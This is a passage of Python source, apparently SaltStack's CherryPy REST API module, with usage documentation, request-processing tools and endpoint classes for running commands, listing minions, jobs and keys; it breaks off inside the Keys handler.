'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`client interfaces <netapi-clients>`
documentation, but in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<netapi-clients>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but that can be brittle
and since salt-api can accept JSON it is best just to send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
from __future__ import absolute_import
import collections
import itertools
import functools
import logging
import json
import os
import signal
import tarfile
import time
from multiprocessing import Process, Pipe
# Import third-party libs
# pylint: disable=import-error
import cherrypy
import yaml
import salt.ext.six as six
# pylint: enable=import-error
# Import Salt libs
import salt
import salt.auth
import salt.utils.event
# Import salt-api libs
import salt.netapi
logger = logging.getLogger(__name__)
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def html_override_tool():
    '''
    Bypass the normal handler and serve HTML for all URLs

    The ``app_path`` setting must be non-empty and the request must ask for
    ``text/html`` in the ``Accept`` header.
    '''
    apiopts = cherrypy.config['apiopts']
    req = cherrypy.request

    # Never hijack requests for the app itself or for static assets.
    skip_prefixes = (
        apiopts.get('app_path', '/app'),
        apiopts.get('static_path', '/static'),
    )

    if 'app' not in apiopts:
        return
    if req.path_info.startswith(skip_prefixes):
        return
    # A wildcard Accept expresses no real preference for HTML.
    if req.headers.get('Accept') == '*/*':
        return

    try:
        preferred = cherrypy.lib.cptools.accept('text/html')
    except cherrypy.HTTPError:
        return
    if preferred != 'text/html':
        return

    raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app'))
def salt_token_tool():
    '''
    Promote an ``X-Auth-Token`` header into the session cookie dict so the
    rest of the session-based auth machinery works unchanged.

    The header, when present, always wins over any existing session cookie.
    '''
    token = cherrypy.request.headers.get('X-Auth-Token', None)
    if token:
        cherrypy.request.cookie['session_id'] = token
def salt_api_acl_tool(username, request):
    '''
    .. versionadded:: 2016.3.0

    Verifies user requests against the API whitelist. (User/IP pair)
    in order to provide whitelisting for the API similar to the
    master, but over the API.

    .. code-block:: yaml

        rest_cherrypy:
            api_acl:
                users:
                    '*':
                        - 1.1.1.1
                        - 1.1.1.2
                    foo:
                        - 8.8.4.4
                    bar:
                        - '*'

    :param username: Username to check against the API.
    :type username: str
    :param request: Cherrypy request to check against the API.
    :type request: cherrypy.request
    :return: True when the request is allowed (or no ACL is configured),
        False when it is denied.
    '''
    failure_str = ("[api_acl] Authentication failed for "
                   "user {0} from IP {1}")
    # Bug fix: "sucessful" -> "successful" in the audit log message.
    success_str = ("[api_acl] Authentication successful for "
                   "user {0} from IP {1}")
    pass_str = ("[api_acl] Authentication not checked for "
                "user {0} from IP {1}")

    acl = None
    # Dig the ACL out of the rest_cherrypy section of the master config.
    salt_config = cherrypy.config.get('saltopts', None)
    if salt_config:
        cherrypy_conf = salt_config.get('rest_cherrypy', None)
        if cherrypy_conf:
            acl = cherrypy_conf.get('api_acl', None)

    ip = request.remote.ip
    if acl:
        users = acl.get('users', {})
        if users:
            if username in users:
                # Explicit per-user entry: match the client IP or a wildcard.
                if ip in users[username] or '*' in users[username]:
                    logger.info(success_str.format(username, ip))
                    return True
                else:
                    logger.info(failure_str.format(username, ip))
                    return False
            elif username not in users and '*' in users:
                # No per-user entry: fall back to the wildcard user entry.
                if ip in users['*'] or '*' in users['*']:
                    logger.info(success_str.format(username, ip))
                    return True
                else:
                    logger.info(failure_str.format(username, ip))
                    return False
            else:
                # A user list exists but neither the user nor '*' is listed.
                logger.info(failure_str.format(username, ip))
                return False
        # NOTE(review): an ACL with an empty `users` dict falls through and
        # returns None (falsy) -- preserved from the original; confirm intent.
    else:
        # No ACL configured at all: allow, and log that nothing was checked.
        logger.info(pass_str.format(username, ip))
        return True
def salt_ip_verify_tool():
    '''
    If there is a list of restricted IPs, verify current
    client is coming from one of those IPs.
    '''
    # Guard-clause style: bail out as soon as any configuration layer is
    # missing, leaving the request untouched.
    salt_config = cherrypy.config.get('saltopts', None)
    if not salt_config:
        return
    cherrypy_conf = salt_config.get('rest_cherrypy', None)
    if not cherrypy_conf:
        return
    auth_ip_list = cherrypy_conf.get('authorized_ips', None)
    if not auth_ip_list:
        return

    logger.debug("Found IP list: {0}".format(auth_ip_list))
    rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
    logger.debug("Request from IP: {0}".format(rem_ip))
    if rem_ip not in auth_ip_list:
        logger.error("Blocked IP: {0}".format(rem_ip))
        raise cherrypy.HTTPError(403, 'Bad IP')
def salt_auth_tool():
    '''
    Redirect all unauthenticated requests to the login page
    '''
    # A session without a token never completed /login -- reject it.
    if 'token' not in cherrypy.session:  # pylint: disable=W8601
        raise cherrypy.HTTPError(401)
    # Authenticated responses are per-user; keep shared caches from
    # storing them.
    cherrypy.response.headers['Cache-Control'] = 'private'
def cors_handler(*args, **kwargs):
    '''
    Check a CORS preflight request and return a valid response
    '''
    req_head = cherrypy.request.headers
    resp_head = cherrypy.response.headers

    allowed_methods = ['GET', 'POST']
    allowed_headers = ['X-Auth-Token', 'Content-Type']

    # Only answer preflights that ask for a method we actually allow.
    requested_method = req_head.get('Access-Control-Request-Method', None)
    if requested_method in allowed_methods:
        resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
        resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
        resp_head['Connection'] = 'keep-alive'
        resp_head['Access-Control-Max-Age'] = '1400'

    # Preflight responses carry no body.
    return {}
def cors_tool():
    '''
    Handle both simple and complex CORS requests

    Add CORS headers to each response. If the request is a CORS preflight
    request swap out the default handler with a simple, single-purpose handler
    that verifies the request and provides a valid CORS response.
    '''
    req_head = cherrypy.request.headers
    resp_head = cherrypy.response.headers

    # Always set response headers necessary for 'simple' CORS.
    resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
    # NOTE(review): 'GET, POST' are HTTP methods, not header names --
    # Access-Control-Expose-Headers normally lists response header names.
    # Left untouched to preserve behavior; confirm intent upstream.
    resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
    resp_head['Access-Control-Allow-Credentials'] = 'true'

    # If this is a non-simple CORS preflight request swap out the handler.
    if cherrypy.request.method == 'OPTIONS':
        cherrypy.serving.request.handler = cors_handler
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference. hypermedia_handler picks the first entry that
# satisfies the client's Accept header.
ct_out_map = (
    ('application/json', json.dumps),
    # YAML output uses block style rather than inline flow style.
    ('application/x-yaml', functools.partial(
        yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
    '''
    Determine the best output format based on the Accept header, execute the
    regular handler, and transform the output to the request content type (even
    if it's an error).

    :param args: Pass args through to the main handler
    :param kwargs: Pass kwargs through to the main handler
    '''
    # Execute the real handler. Handle or pass-through any errors we know how
    # to handle (auth & HTTP errors). Reformat any errors we don't know how to
    # handle as a data structure.
    try:
        cherrypy.response.processors = dict(ct_out_map)
        ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
    except (salt.exceptions.EauthAuthenticationError,
            salt.exceptions.TokenAuthenticationError):
        raise cherrypy.HTTPError(401)
    except salt.exceptions.SaltInvocationError:
        raise cherrypy.HTTPError(400)
    except (salt.exceptions.SaltDaemonNotRunning,
            salt.exceptions.SaltReqTimeoutError) as exc:
        raise cherrypy.HTTPError(503, exc.strerror)
    except (cherrypy.TimeoutError, salt.exceptions.SaltClientTimeout):
        raise cherrypy.HTTPError(504)
    except cherrypy.CherryPyException:
        # Let CherryPy's own control-flow exceptions (redirects, HTTPError,
        # ...) propagate untouched.
        raise
    except Exception:
        import traceback

        logger.debug("Error while processing request for: %s",
                     cherrypy.request.path_info,
                     exc_info=True)

        cherrypy.response.status = 500

        # Bug fix: traceback.format_exc() takes an optional integer `limit`,
        # not the exception instance; passing the exception could itself
        # raise. The current exception is read implicitly from the active
        # exception context.
        ret = {
            'status': cherrypy.response.status,
            'return': '{0}'.format(traceback.format_exc())
                    if cherrypy.config['debug']
                    else "An unexpected error occurred"}

    # Raises 406 if requested content-type is not supported
    best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])

    # Transform the output from the handler into the requested output format
    cherrypy.response.headers['Content-Type'] = best
    out = cherrypy.response.processors[best]
    try:
        return out(ret)
    except Exception:
        msg = 'Could not serialize the return data from Salt.'
        logger.debug(msg, exc_info=True)
        raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
    '''
    Determine the best handler for the requested content type

    Swap the request handler for ``hypermedia_handler``, stashing the
    original handler on the request object so it can still be invoked and
    its output transformed into the negotiated content type.
    '''
    req = cherrypy.serving.request
    req._hypermedia_inner_handler = req.handler
    req.handler = hypermedia_handler
def process_request_body(fn):
    '''
    A decorator to skip a processor function if process_request_body is False

    Bug fix: ``@functools.wraps`` was previously applied to
    ``process_request_body`` itself (without arguments), which turned the
    decorator into a bare ``functools.update_wrapper`` partial -- decorated
    processors were returned unwrapped and the skip logic never ran. It now
    wraps the inner ``wrapped`` function, as intended.
    '''
    @functools.wraps(fn)
    def wrapped(*args, **kwargs):  # pylint: disable=C0111
        # Only invoke the processor when CherryPy has not been told to
        # skip body processing for this request.
        if cherrypy.request.process_request_body is not False:
            fn(*args, **kwargs)
    return wrapped
def urlencoded_processor(entity):
    '''
    Accept x-www-form-urlencoded data (run through CherryPy's formatter)
    and reformat it into a Low State data structure.

    Since we can't easily represent complicated data structures with
    key-value pairs, any more complicated requirements (e.g. compound
    commands) must instead be delivered via JSON or YAML.

    For example::

    .. code-block:: bash

        curl -si localhost:8000 -d client=local -d tgt='*' \\
            -d fun='test.kwarg' -d arg='one=1' -d arg='two=2'

    :param entity: raw POST data
    '''
    # Let CherryPy's stock urlencoded parser populate entity.params first.
    cherrypy._cpreqbody.process_urlencoded(entity)
    serving_req = cherrypy.serving.request
    serving_req.unserialized_data = entity.params
    serving_req.raw_body = ''
@process_request_body
def json_processor(entity):
    '''
    Unserialize raw POST data in JSON format to a Python data structure.

    :param entity: raw POST data
    '''
    payload = entity.fp.read()
    try:
        parsed = json.loads(payload)
    except ValueError:
        raise cherrypy.HTTPError(400, 'Invalid JSON document')
    serving_req = cherrypy.serving.request
    serving_req.unserialized_data = parsed
    serving_req.raw_body = payload
@process_request_body
def yaml_processor(entity):
    '''
    Unserialize raw POST data in YAML format to a Python data structure.

    :param entity: raw POST data
    :raises cherrypy.HTTPError: 400 when the body is not valid YAML
    '''
    body = entity.fp.read()
    try:
        cherrypy.serving.request.unserialized_data = yaml.safe_load(body)
    except (ValueError, yaml.YAMLError):
        # Bug fix: PyYAML signals malformed documents with subclasses of
        # yaml.YAMLError, not ValueError, so bad YAML previously escaped
        # this handler and surfaced as a 500 instead of a 400.
        raise cherrypy.HTTPError(400, 'Invalid YAML document')
    cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
    '''
    Attempt to unserialize plain text as JSON

    Some large services still send JSON with a text/plain Content-Type. Those
    services are bad and should feel bad.

    :param entity: raw POST data
    '''
    raw = entity.fp.read()
    serving_req = cherrypy.serving.request
    try:
        serving_req.unserialized_data = json.loads(raw)
    except ValueError:
        # Not JSON after all -- hand the raw text through untouched.
        serving_req.unserialized_data = raw
    serving_req.raw_body = raw
def hypermedia_in():
    '''
    Unserialize POST/PUT data of a specified Content-Type.

    The following custom processors all are intended to format Low State data
    and will place that data structure into the request object.

    :raises HTTPError: if the request contains a Content-Type that we do not
        have a processor for
    '''
    # Be liberal in what you accept
    ct_in_map = {
        'application/x-www-form-urlencoded': urlencoded_processor,
        'application/json': json_processor,
        'application/x-yaml': yaml_processor,
        'text/yaml': yaml_processor,
        'text/plain': text_processor,
    }

    # Do not process the body for POST requests that have specified no content
    # or have not specified Content-Length
    if (cherrypy.request.method.upper() == 'POST'
            and cherrypy.request.headers.get('Content-Length', '0') == '0'):
        cherrypy.request.process_request_body = False
        cherrypy.request.unserialized_data = None

    # Replace CherryPy's stock processors; any Content-Type missing from the
    # map above is rejected with a 406 via the default processor.
    cherrypy.request.body.processors.clear()
    cherrypy.request.body.default_proc = cherrypy.HTTPError(
        406, 'Content type not supported')
    cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
    '''
    Validate and format lowdata from incoming unserialized request data

    This tool requires that the hypermedia_in tool has already been run.
    '''
    # Only POST bodies carry lowstate; nothing to format for other verbs.
    if cherrypy.request.method.upper() != 'POST':
        return

    data = cherrypy.request.unserialized_data

    # if the data was sent as urlencoded, we need to make it a list.
    # this is a very forgiving implementation as different clients set different
    # headers for form encoded data (including charset or something similar)
    # NOTE(review): collections.Mapping is an alias removed in Python 3.10;
    # collections.abc.Mapping is the long-term spelling -- confirm the
    # supported interpreter range before changing.
    if data and isinstance(data, collections.Mapping):
        # Make the 'arg' param a list if not already
        if 'arg' in data and not isinstance(data['arg'], list):
            data['arg'] = [data['arg']]

        # Finally, make a Low State and put it in request
        cherrypy.request.lowstate = [data]
    else:
        # JSON/YAML bodies are expected to already be a list of chunks;
        # pass them through unchanged.
        cherrypy.serving.request.lowstate = data
# Register the functions above as CherryPy tools at their hook points.
# Within a hook point, lower priority values run earlier (CherryPy
# convention) -- e.g. the X-Auth-Token header must be copied into the
# session cookie (salt_token, 55) before anything auth-related runs, and
# CORS handling (50) precedes the auth check (salt_auth, 60).
cherrypy.tools.html_override = cherrypy.Tool('on_start_resource',
                                             html_override_tool, priority=53)
cherrypy.tools.salt_token = cherrypy.Tool('on_start_resource',
                                          salt_token_tool, priority=55)
cherrypy.tools.cors_tool = cherrypy.Tool('before_request_body',
                                         cors_tool, priority=50)
cherrypy.tools.salt_auth = cherrypy.Tool('before_request_body',
                                         salt_auth_tool, priority=60)
cherrypy.tools.hypermedia_in = cherrypy.Tool('before_request_body',
                                             hypermedia_in)
cherrypy.tools.lowdata_fmt = cherrypy.Tool('before_handler',
                                           lowdata_fmt, priority=40)
cherrypy.tools.hypermedia_out = cherrypy.Tool('before_handler',
                                              hypermedia_out)
cherrypy.tools.salt_ip_verify = cherrypy.Tool('before_handler',
                                              salt_ip_verify_tool)
###############################################################################
class LowDataAdapter(object):
    '''
    The primary entry point to Salt's REST API
    '''
    exposed = True

    _cp_config = {
        'tools.sessions.on': True,
        'tools.sessions.timeout': 60 * 10,  # 10 hours (timeout is in minutes)
        # 'tools.autovary.on': True,
        'tools.hypermedia_out.on': True,
        'tools.hypermedia_in.on': True,
        'tools.lowdata_fmt.on': True,
        'tools.salt_ip_verify.on': True,
    }

    def __init__(self):
        # Master opts are stashed in the cherrypy config by the app bootstrap
        self.opts = cherrypy.config['saltopts']
        self.api = salt.netapi.NetapiClient(self.opts)

    def exec_lowstate(self, client=None, token=None):
        '''
        Pull a Low State data structure from request and execute the low-data
        chunks through Salt. The low-data chunks will be updated to include the
        authorization token for the current session.

        :param client: optional Salt client name; when given it overrides the
            ``client`` key of every chunk.
        :param token: optional eauth token injected into every chunk.
        :return: a generator yielding one result per executed chunk.
        :raises cherrypy.HTTPError: 400 when the lowstate is not a list.
        '''
        lowstate = cherrypy.request.lowstate

        # Release the session lock before executing any potentially
        # long-running Salt commands. This allows different threads to execute
        # Salt commands concurrently without blocking.
        if cherrypy.request.config.get('tools.sessions.on', False):
            cherrypy.session.release_lock()

        # if the lowstate loaded isn't a list, lets notify the client
        if not isinstance(lowstate, list):
            raise cherrypy.HTTPError(400, 'Lowstates must be a list')

        # Make any requested additions or modifications to each lowstate, then
        # execute each one and yield the result.
        for chunk in lowstate:
            if token:
                chunk['token'] = token

            if cherrypy.session.get('user'):
                chunk['__current_eauth_user'] = cherrypy.session.get('user')
            if cherrypy.session.get('groups'):
                chunk['__current_eauth_groups'] = cherrypy.session.get('groups')

            if client:
                chunk['client'] = client

            # Make any 'arg' params a list if not already.
            # This is largely to fix a deficiency in the urlencoded format.
            if 'arg' in chunk and not isinstance(chunk['arg'], list):
                chunk['arg'] = [chunk['arg']]

            ret = self.api.run(chunk)

            # Sometimes Salt gives us a return and sometimes an iterator
            if isinstance(ret, collections.Iterator):
                for i in ret:
                    yield i
            else:
                yield ret

    def GET(self):
        '''
        An explanation of the API with links of where to go next

        .. http:get:: /

            :reqheader Accept: |req_accept|

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000

        .. code-block:: http

            GET / HTTP/1.1
            Host: localhost:8000
            Accept: application/json

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Type: application/json
        '''
        # NOTE: a stray unused `import inspect` was removed here.
        return {
            'return': "Welcome",
            'clients': salt.netapi.CLIENTS,
        }

    @cherrypy.tools.salt_token()
    @cherrypy.tools.salt_auth()
    def POST(self, **kwargs):
        '''
        Send one or more Salt commands in the request body

        .. http:post:: /

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|
            :reqheader Content-Type: |req_ct|

            :resheader Content-Type: |res_ct|

            :status 200: |200|
            :status 400: |400|
            :status 401: |401|
            :status 406: |406|

            :term:`lowstate` data describing Salt commands must be sent in the
            request body.

        **Example request:**

        .. code-block:: bash

            curl -sSik https://localhost:8000 \\
                -b ~/cookies.txt \\
                -H "Accept: application/x-yaml" \\
                -H "Content-type: application/json" \\
                -d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'

        .. code-block:: http

            POST / HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml
            X-Auth-Token: d40d1e1e
            Content-Type: application/json

            [{"client": "local", "tgt": "*", "fun": "test.ping"}]

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Length: 200
            Allow: GET, HEAD, POST
            Content-Type: application/x-yaml

            return:
            - ms-0: true
              ms-1: true
              ms-2: true
              ms-3: true
              ms-4: true
        '''
        return {
            'return': list(self.exec_lowstate(
                token=cherrypy.session.get('token')))
        }
class Minions(LowDataAdapter):
    '''
    Convenience URLs for working with minions
    '''
    _cp_config = dict(LowDataAdapter._cp_config, **{
        'tools.salt_token.on': True,
        'tools.salt_auth.on': True,
    })

    def GET(self, mid=None):
        '''
        A convenience URL for getting lists of minions or getting minion
        details

        .. http:get:: /minions/(mid)

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/minions/ms-3

        .. code-block:: http

            GET /minions/ms-3 HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Length: 129005
            Content-Type: application/x-yaml

            return:
            - ms-3:
                grains.items:
                    ...
        '''
        # No mid means "all minions"
        target = mid or '*'
        cherrypy.request.lowstate = [
            {'client': 'local', 'tgt': target, 'fun': 'grains.items'},
        ]
        grains = self.exec_lowstate(token=cherrypy.session.get('token'))
        return {
            'return': list(grains),
        }

    def POST(self, **kwargs):
        '''
        Start an execution command and immediately return the job id

        .. http:post:: /minions

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|
            :reqheader Content-Type: |req_ct|

            :resheader Content-Type: |res_ct|

            :status 200: |200|
            :status 400: |400|
            :status 401: |401|
            :status 406: |406|

            :term:`lowstate` data describing Salt commands must be sent in the
            request body. The ``client`` option will be set to
            :py:meth:`~salt.client.LocalClient.local_async`.

        **Example request:**

        .. code-block:: bash

            curl -sSi localhost:8000/minions \\
                -b ~/cookies.txt \\
                -H "Accept: application/x-yaml" \\
                -d '[{"tgt": "*", "fun": "status.diskusage"}]'

        .. code-block:: http

            POST /minions HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml
            Content-Type: application/json

            tgt=*&fun=status.diskusage

        **Example response:**

        .. code-block:: http

            HTTP/1.1 202 Accepted
            Content-Length: 86
            Content-Type: application/x-yaml

            return:
            - jid: '20130603122505459265'
              minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
            _links:
              jobs:
              - href: /jobs/20130603122505459265
        '''
        session_token = cherrypy.session.get('token')
        results = list(self.exec_lowstate(client='local_async',
                                          token=session_token))

        # 202 Accepted: the job was queued, not completed
        cherrypy.response.status = 202

        # Build hypermedia links back to the /jobs endpoint for each job
        job_links = []
        for item in results:
            if item:
                job_links.append({'href': '/jobs/{0}'.format(item['jid'])})

        return {
            'return': results,
            '_links': {
                'jobs': job_links,
            },
        }
class Jobs(LowDataAdapter):
    _cp_config = dict(LowDataAdapter._cp_config, **{
        'tools.salt_token.on': True,
        'tools.salt_auth.on': True,
    })

    def GET(self, jid=None, timeout=''):
        '''
        A convenience URL for getting lists of previously run jobs or getting
        the return from a single job

        .. http:get:: /jobs/(jid)

            List jobs or show a single job from the job cache.

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/jobs

        .. code-block:: http

            GET /jobs HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Length: 165
            Content-Type: application/x-yaml

            return:
            - '20121130104633606931':
                Arguments:
                - '3'
                Function: test.fib
                Start Time: 2012, Nov 30 10:46:33.606931
                Target: jerry
                Target-type: glob

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/jobs/20121130104633606931

        .. code-block:: http

            GET /jobs/20121130104633606931 HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Length: 73
            Content-Type: application/x-yaml

            info:
            - Arguments:
                - '3'
              Function: test.fib
              Minions:
                - jerry
              Start Time: 2012, Nov 30 10:46:33.606931
              Target: '*'
              Target-type: glob
              User: saltdev
              jid: '20121130104633606931'
            return:
            - jerry:
                - - 0
                  - 1
                  - 1
                  - 2
                  - 6.9141387939453125e-06
        '''
        lowstate = [{
            'client': 'runner',
            'fun': 'jobs.list_job' if jid else 'jobs.list_jobs',
            'jid': jid,
        }]

        cherrypy.request.lowstate = lowstate
        job_ret_info = list(self.exec_lowstate(
            token=cherrypy.session.get('token')))

        ret = {}
        if jid:
            ret['info'] = [job_ret_info[0]]
            minion_ret = {}
            # Default to an empty mapping so a job with no cached 'Result'
            # (e.g. an unknown or purged jid) returns an empty return set
            # instead of raising AttributeError on None.
            returns = job_ret_info[0].get('Result', {})
            for minion in returns:
                # Check both text and byte-string keys for py2/py3 job caches
                if u'return' in returns[minion]:
                    minion_ret[minion] = returns[minion].get(u'return')
                else:
                    minion_ret[minion] = returns[minion].get('return')
            ret['return'] = [minion_ret]
        else:
            ret['return'] = [job_ret_info[0]]

        return ret
class Keys(LowDataAdapter):
    '''
    Convenience URLs for working with minion keys

    .. versionadded:: 2014.7.0

    These URLs wrap the functionality provided by the :py:mod:`key wheel
    module <salt.wheel.key>` functions.
    '''

    @cherrypy.config(**{'tools.salt_token.on': True})
    def GET(self, mid=None):
        '''
        Show the list of minion keys or detail on a specific key

        .. versionadded:: 2014.7.0

        .. http:get:: /keys/(mid)

            List all keys or show a specific key

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/keys

        .. code-block:: http

            GET /keys HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Length: 165
            Content-Type: application/x-yaml

            return:
              local:
              - master.pem
              - master.pub
              minions:
              - jerry
              minions_pre: []
              minions_rejected: []

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/keys/jerry

        .. code-block:: http

            GET /keys/jerry HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Length: 73
            Content-Type: application/x-yaml

            return:
              minions:
                jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
        '''
        if mid:
            lowstate = [{
                'client': 'wheel',
                'fun': 'key.finger',
                'match': mid,
            }]
        else:
            lowstate = [{
                'client': 'wheel',
                'fun': 'key.list_all',
            }]

